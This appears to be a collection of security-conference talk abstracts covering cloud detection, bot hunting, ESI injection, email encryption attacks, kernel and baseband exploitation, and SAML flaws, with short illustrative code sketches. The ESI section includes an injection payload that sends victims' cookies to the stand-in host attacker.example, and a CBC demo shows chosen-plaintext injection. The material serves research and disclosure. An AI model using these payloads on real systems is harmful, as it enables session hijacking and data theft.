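# Hypothetical illustration: flag CloudTrail events where an access key is used
# from a source IP never before associated with that key.
import json
from collections import defaultdict

def scan(cloudtrail_files):
    seen_ips = defaultdict(set)          # access key id -> source IPs observed
    alerts = []
    for path in cloudtrail_files:
        with open(path) as fh:
            for rec in json.load(fh).get("Records", []):
                key = rec.get("userIdentity", {}).get("accessKeyId")
                ip = rec.get("sourceIPAddress")
                if not key or not ip:
                    continue
                if seen_ips[key] and ip not in seen_ips[key]:
                    alerts.append((key, ip, rec.get("eventName")))
                seen_ips[key].add(ip)
    return alerts

# usage: alerts = scan(["trail-2018-08-01.json", "trail-2018-08-02.json"])
```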
Until recently, major public cloud providers have offered relatively basic toolsets for identifying suspicious activity occurring inside customer accounts that may indicate a compromise. Some organizations have invested significant resources to build their own tools or have leveraged industry vendor offerings to provide this visibility. The reality is that this barrier has meant that a large number of organizations haven't dedicated those resources to this problem and therefore operate without sufficient detection and response capabilities that monitor their cloud accounts for compromise.
Amazon Web Services, Google Cloud Platform, and Microsoft Azure have recently launched a new set of native platform threat and anomalous behavior detection services to help their customers better identify and respond to certain issues and activities occurring inside their cloud accounts. From detecting crypto-currency mining to identifying bot-infected systems to alerting on suspicious cloud credential usage to triggering on cloud-specific methods of data exfiltration, these new services aim to make these kinds of detections much easier and simpler to centrally manage.
But what new and unique insights do they offer? What configuration is required to achieve the full benefits of these detections? What types of activities are not yet covered? What attack methods and techniques can avoid detection by these systems and still be successful? What practical guidelines can be followed to make the best use of these services in an organization?
Follow along as we attempt to answer these questions using practical demonstrations that highlight the real threats facing cloud account owners and how the new threat detection capabilities perform in reducing the risks of operating workloads in the public cloud.
For years and years, anti-malware solutions across many levels of the network have been assisted by online anti-virus aggregation services and online sandboxes to extend their detection level and identify unknown threats. But this power booster comes with a price tag. Even today, enterprises all over the world are using security solutions that, instead of protecting their data, treat it as suspicious and share it with online multi-scanners. The result is drastic. All that separates a hacker from extracting that data on a daily basis is a couple of hundred euros a month, a price that could easily be covered if the hacker finds a single person of interest. In just a couple of days, one skilled hacker can build an intelligence platform that could be sold for 10 times the money they invested.
The data is being leaked daily, and the variety is endless. In our research, we dived into these malware-scanning giants and built sophisticated Yara rules to capture non-malicious artifacts and dissect them for secrets you never thought could get out of their chamber. But that's not all. We will show the audience how we built an intelligence tool that, upon insertion of an API key, will auto-dissect a full dataset. In our talk, we reveal the awful truth about allowing internally installed security products to be romantically involved with online scanners.
Automated Twitter accounts have been making headlines for their ability to spread spam and malware as well as significantly influence online discussion and sentiment. In this talk, we explore the economy around Twitter bots, and demonstrate how attendees can track down bots through a three-step methodology: building a dataset, identifying common attributes of bot accounts, and building a classifier to accurately identify bots at scale.
We first demonstrate how to amass a large dataset of public Twitter accounts using the Twitter API, gathering basic profile information as well as public activity from each account. We go on to gather and map the "social graph" of each account, such as who the account is following and, likewise, who is following the account.
After this dataset has been obtained, we explore how to identify bots within it. We show common techniques used by real-world bot operators to try to keep the bot "under the radar", which can in many cases be used to help fingerprint the bot. Finally, we demonstrate how we can tackle the bot problem at scale using data science to build a classifier that accurately identifies bots across our large global dataset.
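To make the classification step tangible, here is a hedged sketch: hand-crafted account features fed to a random forest. The feature list and the tiny synthetic dataset are made up for illustration; the talk's real data comes from the Twitter API crawl described above.

```python
# Sketch of bot classification with invented features and synthetic data.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

FEATURES = ["tweets_per_day", "followers", "following", "follower_ratio",
            "account_age_days", "default_profile_image", "avg_links_per_tweet"]

rng, n = np.random.default_rng(0), 400
humans = np.column_stack([rng.normal(5, 3, n), rng.normal(300, 200, n),
                          rng.normal(250, 150, n), rng.normal(1.2, 0.5, n),
                          rng.normal(1500, 700, n), rng.integers(0, 2, n) * 0.1,
                          rng.normal(0.2, 0.1, n)])
bots = np.column_stack([rng.normal(120, 40, n), rng.normal(50, 40, n),
                        rng.normal(2000, 800, n), rng.normal(0.03, 0.02, n),
                        rng.normal(90, 60, n), rng.integers(0, 2, n) * 0.8,
                        rng.normal(0.9, 0.1, n)])
X, y = np.vstack([humans, bots]), np.array([0] * n + [1] * n)

X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.25, random_state=0)
clf = RandomForestClassifier(n_estimators=200, random_state=0).fit(X_tr, y_tr)
print("held-out accuracy:", clf.score(X_te, y_te))
print(dict(zip(FEATURES, clf.feature_importances_.round(3))))
```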
When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks.
The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked with parsing and executing these instructions is not able to distinguish between ESI instructions legitimately provided by the application server and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: we identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking.
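A hedged illustration of what such an injection looks like: user input reflected by the origin server is later interpreted as ESI by the surrogate. The <esi:include> tag and the $(HTTP_COOKIE) variable are standard ESI language features; the attacker URL and the reflected page are placeholders.

```python
# Illustration of ESI injection: the origin treats the tag as inert text, but an
# ESI-enabled surrogate parses it, fetches the src URL server-side (SSRF), and
# expands $(HTTP_COOKIE) -- leaking cookies, including HttpOnly ones, with no
# JavaScript in the victim's browser. URLs below are placeholders.
reflected_input = '<esi:include src="http://attacker.example/collect?c=$(HTTP_COOKIE)"/>'

origin_response = f"""<html><body>
You searched for: {reflected_input}
</body></html>"""

print(origin_response)
```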
Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into the good stuff: identification and exploitation of popular ESI engines, and mitigation recommendations.
OpenPGP and S/MIME are the two prime standards for providing end-to-end security for emails. From today's viewpoint this is surprising as both standards rely on outdated cryptographic primitives that were responsible for vulnerabilities in major cryptographic standards. The belief in email security is likely based on the fact that email is non-interactive and thus an attacker cannot directly exploit vulnerability types present in TLS, SSH, or IPsec.
We show that this assumption is wrong. We use a novel attack technique called malleability gadgets to inject malicious plaintext snippets into encrypted emails via malleable encryption. These snippets abuse existing and standard-conforming backchannels, for example, in HTML, CSS, or x509 functionality, to exfiltrate the full plaintext after decryption. The attack is triggered when the victim decrypts a single maliciously crafted email from the attacker.
We devise working malleability gadgets for both OpenPGP and S/MIME encryption, and show that exfiltration channels exist for 25 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients. While it is necessary to change the OpenPGP and S/MIME standards to fix these vulnerabilities, some clients had even more severe implementation flaws allowing straightforward exfiltration of the plaintext.
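The malleability these gadgets rely on can be shown in isolation with a hedged toy: in unauthenticated CBC (as used by S/MIME), knowing one plaintext block lets an attacker rewrite it into chosen content by XOR-editing the block that precedes it (here, the IV). The key, the known header block, and the injected HTML fragment are illustrative; the real attack additionally depends on the mail client rendering the resulting HTML.

```python
# CBC malleability in isolation: with one known plaintext block and no MAC,
# XOR-editing the preceding block (the IV here) yields chosen plaintext.
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key, iv = os.urandom(16), os.urandom(16)

def aes_cbc(iv_, op, data):
    ctx = Cipher(algorithms.AES(key), modes.CBC(iv_))
    f = ctx.encryptor() if op == "enc" else ctx.decryptor()
    return f.update(data) + f.finalize()

known  = b"Content-type: te"                # first block, predictable MIME header
rest   = b"xt/html\r\n\r\nDear Alice, the code is 1234."
padded = (known + rest).ljust(64, b" ")     # keep the toy message block-aligned
ct     = aes_cbc(iv, "enc", padded)

chosen = b'<img src="http:/'                # attacker-chosen 16-byte replacement
new_iv = bytes(i ^ k ^ c for i, k, c in zip(iv, known, chosen))

print(aes_cbc(new_iv, "dec", ct))           # first block now reads as the <img tag
```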
Traditional phishing and social engineering attack techniques are typically well-documented and understood. While such attacks often still succeed, a combination of psychology, awareness campaigns, and technical or physical controls has made significant progress in limiting their effectiveness.
In response, attackers are turning to increasingly sophisticated and longer-term efforts involving self-referencing synthetic networks, multiple credible false personae, and highly targeted and detailed reconnaissance. This approach, which I call ROSE (Remote Online Social Engineering), is a variant of catfishing, and is performed with the specific aim of compromising an organisation's network. By building rapport with targeted victims, attackers are able to elicit sensitive information, gather material for extortion, and persuade users to take actions leading to compromises.
In this talk, I place ROSE within the context of other false personae activities – trolling, sockpuppetry, bots, catfishing, and others – using detailed case studies, and provide a comprehensive and in-depth methodology of an example ROSE campaign, from target selection and profile building, through to first contact and priming victims, and finally to the pay-off and exit strategies, based on experiences from red team campaigns.
I'll discuss three case studies of ROSE attacks in the wild, comparing them to the methodology I developed, and will then discuss the ethical, social, and legal issues involved in ROSE attacks. I'll proceed to cover ROSE from a defender's perspective, examining ways in which specific techniques can be detected and prevented, through technical controls, attribution, linguistic analysis, and responses to specific enquiries. To take this approach one step further, I'll also explore ways in which ROSE techniques could be used for 'offensive defence'.
Finally, I'll wrap up by examining future techniques which could be of use during ROSE campaigns or for their detection, and will invite the audience to suggest other ways in which ROSE techniques could be combatted.
In this talk, we will explore the baseband of a modern smartphone, discussing the design and the security countermeasures that are implemented. We will then move on and explain how to find memory corruption bugs and exploit them. As a case study, we will explain in detail our 2017 Mobile Pwn2Own entry, where we gained RCE (Remote Code Execution) with a 0-day on the baseband of a smartphone that was among the targets of the competition. We successfully exploited the phone remotely over the air without any user interaction and won $100,000 for this competition target.
An information security awareness program serves to protect business data through user education, enabling users to properly handle constant information security threats and minimizing their impact on the individual and the organization. Past research has not offered comprehensive studies involving an established security awareness program that uses both end user training and marketing tools to communicate and create awareness. Instead, these studies focused on the impact of data loss and addressing the importance of establishing user awareness.
The Office of Information Security at Mayo Clinic has established an ongoing enterprise-wide security awareness program. With the help of Information Security Ambassadors who assist in the delivery of this message, the study explores the lived experiences of this peer group to determine the impact of autonomous peer influence as it relates to phishing detection, rather than relying on technology alone.
The significance of this research is in helping to identify whether and how much peer influence promotes learning and user adaptation to safeguard users from malicious phishing in both business and private environments. This phenomenological approach aims to assist in the design of a multifaceted security awareness approach that promotes behavior change among a diverse population.
In a world of high volume malware and limited researchers, we need a dramatic improvement in our ability to process and analyze new and old malware at scale. Unfortunately, what is currently available to the community is incredibly cost prohibitive or does not rise to the challenge. As malware authors and distributors share code and prepackaged tool kits, the white hat community is dominated by solutions aimed at profit as opposed to augmenting capabilities available to the broader community. With that in mind, we are introducing our library for malware disassembly called Xori as an open source project. Xori is focused on helping reverse engineers analyze binaries, optimizing for time and effort spent per sample.
Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and provides triage analysis data. This Rust library emulates the stack, register states, and reference tables to identify suspicious functionality for manual analysis. Xori extracts structured data from binaries to use in machine learning and data science pipelines.
We will go over the pain-points of conventional open source disassemblers that Xori solves, examples of identifying suspicious functionality, and some of the interesting things we've done with the library. We invite everyone in the community to use it, help contribute and make it an increasingly valuable tool in this arms race.
Setting up a fuzzing pipeline takes time and manual effort for identifying fuzzable programs and configuring the fuzzer.
Usually, only large software projects with dedicated testing teams at their disposal are equipped to use fuzz testing in their Security Development Lifecycle. Other projects with limited resources cannot easily use this effective technique in their SDL. This renders the software landscape unnecessarily insecure. Less popular software applications, especially, are not being fuzzed due to a lack of resources and easy-to-use tooling.
Lowering the skill level and effort required to set up a fuzzing pipeline therefore results in a significant increase in the security of today's software. To tackle this challenge, we developed an easy-to-use framework, FuzzExMachina (FExM), that reduces manual effort to a minimum.
Using clever input inference methods and containerization, we automate the fuzzing pipeline from start to end in a scalable fashion. We support acquiring binaries from a variety of sources, including blackbox binaries and source code repositories.
In cases where FExM cannot automatically achieve high coverage, it drops users into a novel AFL mode, "AFL-TimeWarp", in which they can set up test cases without the need to alter or understand the underlying code. AFL-TimeWarp mode allows fuzzing of deeper program states without writing a single line of code, fitting FExM's philosophy of keeping things simple for users.
To test the viability of our framework, we fuzzed over one hundred packages from the Arch Linux package repository with essentially zero effort. After only a few days, we had already found 11 crashes, six of which were exploitable. This shows how FExM permits automated, distributed fuzzing of applications and crash exploitability classification; it is also equipped with a web front end for navigating security issues in a convenient way. Our work automatically retrofits fuzzing into the security development lifecycle.
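To give a sense of the per-target automation such a pipeline performs, here is a hedged sketch of a single fuzzing job: seed corpus in, afl-fuzz running inside a container, crashes collected out. The Docker image name, paths, and flags are illustrative; this is not FExM's actual implementation, and a real pipeline must also handle instrumentation or QEMU mode for blackbox binaries.

```python
# Sketch of one containerized fuzzing job of the kind a pipeline automates.
# Image name, mounts, and flags are illustrative only.
import pathlib
import subprocess

def launch_job(target_binary, seeds, out_dir, image="aflplusplus/aflplusplus"):
    pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
    target = pathlib.Path(target_binary)
    cmd = [
        "docker", "run", "--rm",
        "-v", f"{target.parent.resolve()}:/target:ro",
        "-v", f"{pathlib.Path(seeds).resolve()}:/seeds:ro",
        "-v", f"{pathlib.Path(out_dir).resolve()}:/out",
        image,
        "afl-fuzz", "-i", "/seeds", "-o", "/out", "-m", "none",
        "--", f"/target/{target.name}", "@@",
    ]
    return subprocess.Popen(cmd)

def collect_crashes(out_dir):
    # AFL writes crashing inputs under <out>/<fuzzer>/crashes/id:...
    return sorted(pathlib.Path(out_dir).glob("**/crashes/id:*"))
```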
These days it's hard to find a business that doesn't accept faster payments. Mobile Point of Sale (mPOS) terminals have propelled this growth, lowering the barriers for small and micro-sized businesses to accept non-cash payments. Older payment technologies like mag-stripe still account for the majority of all in-person transactions. This is complicated further by the introduction of new payment standards such as NFC. As with each new iteration in payment technology, weaknesses are inevitably introduced into this increasingly complex payment ecosystem.
In this talk, we ask: what are the security and fraud implications of removing the economic barriers to accepting card payments, and what are the risks associated with continued reliance on old card standards like mag-stripe? In the past, testing for payment attack vectors has been limited to the scope of individual projects and to those with permanent access to POS and payment infrastructure. Not anymore!
In what we believe to be the most comprehensive research conducted in this area, we consider four of the major mPOS providers spread across the US and Europe: Square, SumUp, iZettle, and PayPal. We provide live demonstrations of new vulnerabilities that allow you to MitM transactions, send arbitrary code via Bluetooth and the mobile application, modify payment values for mag-stripe transactions, and exploit a vulnerability in firmware (DoS to RCE). Using this sampled geographic approach, we are able to show the current attack surface of mPOS and to predict how it will evolve over the coming years.
For audience members who are interested in integrating testing practices into their organization or research practices, we will show you how to use mPOS to identify weaknesses in payment technologies, and how to remain undetected in spite of anti-fraud and security mechanisms.
Online bots and real-world robots are both capable of manipulating people and communities. Online bots are part of attacks on human belief systems that range in scale from nation-states to smaller communities, aimed at disrupting, causing division, and forcing group opinion. Current bot developers have shown good results with relatively unsophisticated programs, but algorithms exist to make these bots much more effective. Embodying these online bots in physical hardware changes both the social dynamics and the legal implications of their actions. Embodied bots (i.e., robots) can be used to socially engineer people by gaining their trust and manipulating them into doing or saying something they otherwise might not. Increasingly sophisticated, free-roaming bots and robots also bring questions of responsibility, personhood, privacy rights, and liability: we need to develop legal and policy frameworks to address AI, robots, and their interplay with our society now.
We discuss the mechanisms by which bots and robots manipulate people, the mitigations available, and the legal implications of such behaviours. We cover how to manipulate people online at scale, who's doing it (and why), why it works and how to defend yourself. We talk about the interplay between large-scale data collection and embodied robot manipulation of humans, how emotions are used, and how data collected by robots can be even more privacy invading because people form social bonds and attachments with robots. We also cover robot policy and law, and expected issues as bots become more sophisticated and ubiquitous. We finish with recommendations for attendees wanting to counter potential attacks.
Writing a working exploit for a vulnerability is generally challenging, time-consuming, and labor-intensive. To address this issue, automated exploit generation techniques can be adopted. In practice, however, existing techniques exhibit an insufficient ability to craft exploits, particularly for kernel vulnerabilities. On the one hand, this is because their technical approaches explore exploitability only in the context of a crashing process, whereas generating an exploit for a kernel vulnerability typically needs to vary the context of a kernel panic. On the other hand, this is because the program analysis techniques used for exploit generation are suitable only for simple programs, not an OS kernel with far greater complexity and scale.
In this talk, we will introduce and release a new exploitation framework to fully automate the exploitation of kernel vulnerabilities. Technically speaking, our framework utilizes a kernel fuzzing technique to diversify the contexts of a kernel panic and then leverages symbolic execution to explore exploitability under different contexts. We demonstrate that this new exploitation framework facilitates exploit crafting from many aspects.
First, it augments a security analyst with the ability to automate the identification of system calls that he needs to take advantage of for vulnerability exploitation. Second, it provides security analysts with the ability to bypass security mitigations. Third, it allows security analysts to automatically generate exploits with different exploitation objectives (e.g., privilege escalation or data leakage). Last but not least, it equips security analysts with the ability to generate exploits even for those kernel vulnerabilities whose exploitability has not yet been confirmed or verified.
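The framework itself targets kernel panics, but the symbolic-execution half of the idea can be illustrated with a heavily simplified user-space analogue using an off-the-shelf engine such as angr: given a crashing binary, search for a concrete input that drives execution to a state the analyst cares about. The binary name, addresses, and input size below are hypothetical placeholders, and this is not the framework released in the talk.

```python
# User-space analogue only: use symbolic execution to find an input reaching a
# chosen program state. Binary name and addresses are hypothetical.
import angr
import claripy

proj = angr.Project("./vuln_service", auto_load_libs=False)
arg = claripy.BVS("arg", 8 * 32)                      # 32 symbolic input bytes
state = proj.factory.entry_state(args=["./vuln_service", arg])
simgr = proj.factory.simulation_manager(state)

# Search for a state that reaches the corrupted-function-pointer call site while
# avoiding the clean-exit path (both addresses are placeholders).
simgr.explore(find=0x401337, avoid=0x401400)

if simgr.found:
    print("input reaching the target state:",
          simgr.found[0].solver.eval(arg, cast_to=bytes))
```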
Along with this talk, we will also release many unpublished working exploits against several kernel vulnerabilities. It should be noted that the vulnerabilities we experimented with primarily involve use-after-free and heap overflow bugs. Among all these test cases, more than 50% do not have working exploits publicly available. To illustrate this release, I have already disclosed one working exploit on my personal website (http://ww9210.cn/). The exploit released on my site pertains to CVE-2017-15649, for which no publicly available exploit has previously demonstrated an SMAP bypass.
Organizations have been forced to adapt to the new reality: Anyone can be targeted and many can be compromised.
This has been the catalyst for many to tighten up operations and revamp ancient security practices. They bought boxes that blink and software that floods the SOC with alerts. Is it enough?
The overwhelming answer is: No.
The security controls that matter most are the ones that best protect those with the keys to the enterprise, the Active Directory administrators. With this access, an attacker can do anything they want in the environment: access all sensitive data, change access controls and security settings, embed to persist (for years), and often fully manage and control routers, switches, the virtualization platform (VMWare or Microsoft Hyper-V), and increasingly, the cloud platform.
Administrators are being dragged into a new paradigm where they have to more securely administer the environment. This involves protecting privileged credentials and limiting access. Again the question is: Are the new ways to securely administer Active Directory enough to protect against attackers? Join me in this session to find out.
Some of the areas explored in this talk:
* Explore how common methods of administration fail.
* Demonstrate how attackers can exploit flaws in typical Active Directory administration.
* Highlight common mistakes organizations make when administering Active Directory.
* Discuss what's required to protect admins from modern attacks.
* Provide the best methods to ensure secure administration and how to get executive, operations, and security team acceptance.
Complexity is increasing. Trust eroding. In the wake of Spectre and Meltdown, when it seems that things cannot get any darker for processor security, the last light goes out. This talk will demonstrate what everyone has long feared but never proven: there are hardware backdoors in some x86 processors, and they're buried deeper than we ever imagined possible. While this research specifically examines a third-party processor, we use this as a stepping stone to explore the feasibility of more widespread hardware backdoors.
Virtualization technology is fast becoming the backbone of the security strategy for modern computing platforms. Hyper-V, Microsoft's virtualization stack, is no exception and is therefore held to a high security standard, as is demonstrated by its $250,000 public bug bounty program.
As one might expect, Microsoft's own engineers are continually looking for vulnerabilities in the code that makes up their products. Perhaps more unexpectedly, Microsoft also develops exploits for these products in an effort to gain a better understanding of the techniques involved and mitigate them before they can be used against customers. In this talk, we will relate how Microsoft's Offensive Security Research (OSR) team did just that with Hyper-V by discovering CVE-2017-0075, developing relevant and novel exploitation techniques to exploit it, and finally contributing learnings to Hyper-V hardening efforts. The presentation will walk through every step of this process in great detail, culminating in a live Hyper-Pwning demonstration.
Substance abuse is present in and affects all communities, even information security. This session will detail the relationship between stress, addiction, and relapse. Additionally, the speaker will discuss her experience with alcohol use disorder while maintaining a career in information security and share advice on how people and companies can be inclusive and supportive for those living a clean and/or sober life. Attendees will gain perspective and a greater understanding of their peers and employees in recovery.
When incidents of sexual harassment or sexual assault occur within communities, as we've recently seen in InfoSec, how can a community respond in ways that support survivors and also hold problematic members accountable? How does a community move forward together stronger after these incidents? How do I support a friend who has been assaulted or harassed? How do I respond when a friend is accused?
This session outlines how someone with Autism Spectrum Disorder (ASD) offers a unique skillset that can be very helpful in the cybersecurity field.
A higher percentage of hackers show signs of ASD, or have already been diagnosed with it, than people who are not hackers and/or do not work in the security industry.
Many organizations see hiring a young person with any type of mental illness as a gamble, including someone with ASD. In this talk, we are going to give three different perspectives on the positive and challenging elements of hiring, managing, and enabling an ASD employee to thrive, applying their particular characteristics to the tasks associated with cybersecurity.
Hear from a hiring manager, a security professional that has been on the positive side of the spectrum for years, and a psychologist that has researched Autism Spectrum Disorder (ASD) and the specific behaviors that can be helpful for the corporate and/or intelligence sector.
Despite its simplicity, the "software bill of materials" (SBOM) has been met with apathy and hostility, especially in policy circles. Why has this common industrial concept been so unpopular when translated into the information security context, and how can it potentially revolutionize our industry? This talk will shed light onto the policy context of this discussion, and lay out a vision of how members of the security community can win over the naysayers to foster greater transparency.
The US Department of Commerce recently announced a new 'multistakeholder initiative' on software bill of materials. The goal is for software and IoT vendors to share details on the underlying components, libraries, and dependencies with enterprise customers. This transparency can catalyze a more efficient market for security by allowing vendors to signal quality and giving enterprise customers key knowledge—you can't defend what you don't know about.
This transparency creates a new paradigm of shared security responsibilities, where an enterprise customer can have greater insight into what is running on their network. This, in turn, complicates existing relationships between vendor and customer. With this transparency, how can vendors offer assurances that a discovered vulnerability doesn't affect a particular product? How can vendors safeguard trade secrets with an incomplete SBOM, along the lines of "natural and artificial flavorings" on an ingredient list? And lastly, how will this inform the emerging debate over end-of-life in the IoT space, particularly for medical devices and automobiles that have a physical lifespan beyond their software support model? None of these hurdles are insurmountable, but solutions will require finding common ground. A world where SBOMs are more common can be a more secure world, but we'll need to tackle the newly raised policy issues as well.
Despite high-profile failures, there can be no doubt that embedded security is improving. Yet, several dark clouds loom on the horizon – including side channel attacks and fault attacks. For many, they remain vague and undefined, with complicated analysis required to understand if they are even applicable to a target of interest, let alone how to perform the attack.
This talk introduces a new open-source tool, called ChipWhisperer-Lint, that will solve at least one of these problems. It can be used with the open-source ChipWhisperer hardware to completely automate finding power analysis attacks in arbitrary devices. The initial tool supports the AES algorithm, and five microcontrollers with AES hardware acceleration (which have not been previously broken) will be demonstrated to be vulnerable to side-channel power analysis. These attacks mean products relying on their encryption to protect critical secrets could be easily compromised (such as happened with the Philips Hue attack).
This tool extends Colin's previous work in making power analysis attacks accessible to every engineer with open-source hardware and software. This latest tool is a leap forward in accessibility (and laziness), removing even the need to truly understand how the attacks work. Now there can truly be no excuse for using insecure devices in your products, as finding specific side-channel power analysis vulnerabilities can be done in a few minutes across a wide range of embedded devices.
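For readers unfamiliar with what such a tool automates, the following is a minimal correlation power analysis (CPA) sketch, not ChipWhisperer-Lint itself: it assumes you already have captured traces and known plaintexts, and it ranks key-byte guesses by how well a simple Hamming-weight leakage model correlates with the measurements.

```python
import numpy as np

# Placeholder: substitute the standard 256-entry AES S-box here.
SBOX = np.zeros(256, dtype=np.uint8)

def hamming_weight(values):
    bits = np.unpackbits(values.astype(np.uint8)[:, None], axis=1)
    return bits.sum(axis=1)

def cpa_rank_key_byte(traces, plaintexts, byte_index):
    """Rank guesses for one key byte by correlating predicted vs. measured leakage."""
    centered_traces = traces - traces.mean(axis=0)
    scores = np.zeros(256)
    for guess in range(256):
        # Predicted leakage: Hamming weight of the first-round S-box output.
        model = hamming_weight(SBOX[plaintexts[:, byte_index] ^ guess]).astype(float)
        model -= model.mean()
        corr = model @ centered_traces
        corr /= np.linalg.norm(model) * np.linalg.norm(centered_traces, axis=0) + 1e-12
        scores[guess] = np.abs(corr).max()      # peak correlation over all samples
    return np.argsort(scores)[::-1]             # most likely key byte first

# traces: shape (n_traces, n_samples) floats; plaintexts: shape (n_traces, 16) uint8
```

The value of the automated tooling is in running this kind of analysis, plus the capture setup, across many targets and leakage models without manual effort.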
SAML is often the trust anchor for Single Sign-On (SSO) in most modern day organizations. This presentation will discuss a new vulnerability discovered which has affected multiple independent SAML implementations, and more generally, can affect any systems reliant on the security of XML signatures. The issues found through this research affected multiple libraries, which in turn may underpin many SSO systems.
The root cause of this issue is due to the way various SAML implementations traverse the XML DOM after validating signatures. These vulnerabilities allow an attacker to tamper with signed XML documents, modifying attributes such as an authenticating user, without invalidating the signatures over these attributes. In many cases, this allows an attacker with authenticated access to a SAML Identity Provider to access services as an entirely different user - and more easily than you'd expect.
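To make the class of issue concrete, here is a hedged, self-contained illustration (not the exact bug in any particular library) of how two common XML parsing approaches can disagree about the text of a NameID element once a comment is inserted; signature canonicalization typically ignores comments, so both readings can coexist with a valid signature. The value and suffix below are invented.

```python
from xml.etree import ElementTree
from lxml import etree

xml = b"<NameID>user@example.com<!---->.attacker.example</NameID>"

# lxml keeps the comment as a child node, so .text stops at the comment:
print(etree.fromstring(xml).text)          # -> user@example.com

# The stdlib parser drops comments and merges the surrounding character data:
print(ElementTree.fromstring(xml).text)    # -> user@example.com.attacker.example
```

If the service provider extracts the first form while the signed assertion actually contains the second, an attacker who controls part of their own identifier can end up authenticated as a different user.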
This talk will also discuss another demonstrated class of vulnerabilities in user directories that amplify the impact of the previously mentioned vulnerability, and in some cases, can enable authentication bypasses on their own.
The majority of systematic approaches to information security are created by contributors from stable nation states, where the design assumes that the originator is wholesome and true, the playing field is lush and green and the children frolic care-free making daisy-chain bracelets. This talk discusses the realities of corruption, with real-life anecdotes from interviews conducted with real criminals and victims. This talk also explains the challenges and differences between trying to 'do' information security in developed and developing countries, where often corruption can derail security efforts and the people put in place to run the show are working against you. I also discuss typical challenges of working in difficult climates, how this can impact us (as security warriors), with first-hand accounts from those involved and some of the things we can do to combat corruption.
A basic understanding of threat modelling and a slightly dark sense of humour are advantageous in getting the most out of this talk.
Computer malware in all its forms is nearly as old as the first PCs running commodity OSes, dating back at least 30 years. However, the number and the variety of "computing devices" dramatically increased during the last several years. Therefore, the focus of malware authors and operators slowly but steadily started shifting or expanding towards Internet of Things (IoT) malware.
Unfortunately, at present there is no publicly available comprehensive study and methodology that collects, analyses, measures, and presents the (meta-)data related to IoT malware in a systematic and holistic manner. In most cases, if not all, the resources on the topic are available as blog posts, sparse technical reports, or Systematization of Knowledge (SoK) papers deeply focused on a particular IoT malware strain (e.g., Mirai). At other times those resources are already unavailable, or can become unavailable or restricted at any time. Moreover, many such resources contain errors (e.g., wrong CVEs), omissions (e.g., missing hashes), limited perspectives (e.g., network behaviour only), or otherwise present incomplete or inaccurate analysis. Hence, all these factors leave the main challenges of analysing, tracking, detecting, and defending against IoT malware in a systematic, effective and efficient way unaddressed.
This work attempts to bridge this gap. We start with mostly manual collection, archival, meta-information extraction and cross-validation of more than 637 unique resources related to IoT malware families. These resources relate to 60 IoT malware families, and include 260 resources related to 48 unique vulnerabilities used in the disclosed or detected IoT malware attacks. We then use the extracted information to establish as accurately as possible the timeline of events related to each IoT malware family and the relevant vulnerabilities, and to outline important insights and statistics. For example, our analysis shows that the mean and median CVSS scores of all analyzed vulnerabilities employed by the IoT malware families are still quite modest: 6.9 and 7.1 for CVSSv2, and 7.5 and 7.5 for CVSSv3, respectively. Moreover, the public knowledge to defend against or prevent those vulnerabilities could have been used, on average, at least 90 days before the first malware samples were submitted for analysis. Finally, to help validate our work as well as to motivate its continuous growth and improvement by the research community, we open-source our datasets and release our IoT malware analysis framework.
Claims abound that the Mafia is not only getting involved in cybercrime, but taking a leading role in the enterprise. One can find such arguments regularly in media articles, on blogs, and in discussions with members of the information security industry. In some sense it has become a mainstream position. But, what evidence actually exists to support such claims?
Drawing on a seven year University of Oxford study into the organisation of cybercrime, this talk evaluates whether the Mafia is in fact taking over cybercrime, or whether the structure of the cybercriminal underground is something new. It brings serious empirical rigor to a question where such evidence is often lacking. This analysis is based on almost 250 interviews with law enforcement, the private sector and former cybercriminals. These were carried out in some 20 countries, including fieldwork in purported cybercrime "hotspots" like Russia, Ukraine, Romania, Nigeria, Brazil, and China.
This talk broadly addresses the range of connections between Mafias, organised crime, and cybercrime. But, it focuses this discussion on the so-called "Russian Mafia," as this is the specific bogeyman that many claims invoke, and because some of the most sophisticated cybercrime actors are based in the former Soviet Bloc. As part of this discussion, a more informed understanding will be developed around: what a Mafia is, the evolution of the Russian Mafia, and known cases where organised criminals have been directly involved in cybercrime.
In determining whether cybercrime is best conceptualised and tackled through an organised crime prism or not, this talk should be of relevance to a range of members of the cybersecurity community, including policymakers, law enforcement and the private sector. It is an exclusive presentation of book material to be published in the Fall by Harvard University Press.
Recent years have seen the emergence of PHP unserialization vulnerabilities as a viable route to remote code execution or other malicious outcomes. The presentation will start with a brief refresher on the issue as it has previously been understood before introducing new research which shows how unserialization can be induced when other types of vulnerability occur, including some that would previously have been considered low impact.
The presentation will include demos of long lived and previously unidentified RCE exploits against some of the most widely deployed open source PHP web applications and libraries.
Modern operating systems implement read-only memory mappings at the CPU architecture level, preventing common security attacks. By mapping memory as read-only, the memory owner process can usually trust the memory content, making security considerations such as boundary checks and TOCTTOU (time-of-check-to-time-of-use) issues unnecessary, on the assumption that other processes are not able to mutate read-only shared mappings in their own virtual address spaces.
